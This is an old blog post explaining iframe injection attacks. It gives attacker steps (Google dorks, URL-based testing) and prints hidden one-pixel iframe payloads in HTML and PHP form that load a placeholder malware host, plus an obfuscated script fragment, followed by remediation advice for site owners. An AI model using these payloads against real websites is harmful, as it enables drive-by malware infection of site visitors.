Thursday, May 24, 2012

What is an IFrame Injection? Mass IFrame Attack Tutorial

What is an IFrame Injection? Using IFrame tag, The Attackers injects the malware contain website(links) using Cross site Scripting in popular websites. So if the usual visitors of that popular sites opens the website, it will redirect to malware contain website. Malware will be loaded to your computer, now you are infected

What is IFrame Tag? <Iframe> tag stands for Inline Frame. It is used to insert contents from another website or server. That can be useful for building online applications.

IFrame Injection Attack: Malware Attackers use this IFrame and include the malware websites. They are able to include the webpage one pixel square(You won't able to see it in webpage). Obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - leaving no obvious clue that it's malicious.

What an attacker can do with Iframe Injection? Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more.

Iframe Injection Tutorial:
1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

Obfuscate javascript
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…
4. So if the clients load page, his system will be infected..

What you have to do, if you infected by Iframe Injection?
1. Change your passwords of ftp, control panel and database.
2. Inform to your hosting service about the injection attack and they will take care of server injection .
3. Download all your files from the hosting and check whether they are infected or not. if you found any infected files, clean it.
4. Buy a good antivirus software, Scan your Computer completely.
5. Don't use the Public systems for logging into your Hosting service.

This is purely for Educational purpose only. Don't use it for illegal.


Post a Comment

Design by Secure Hackers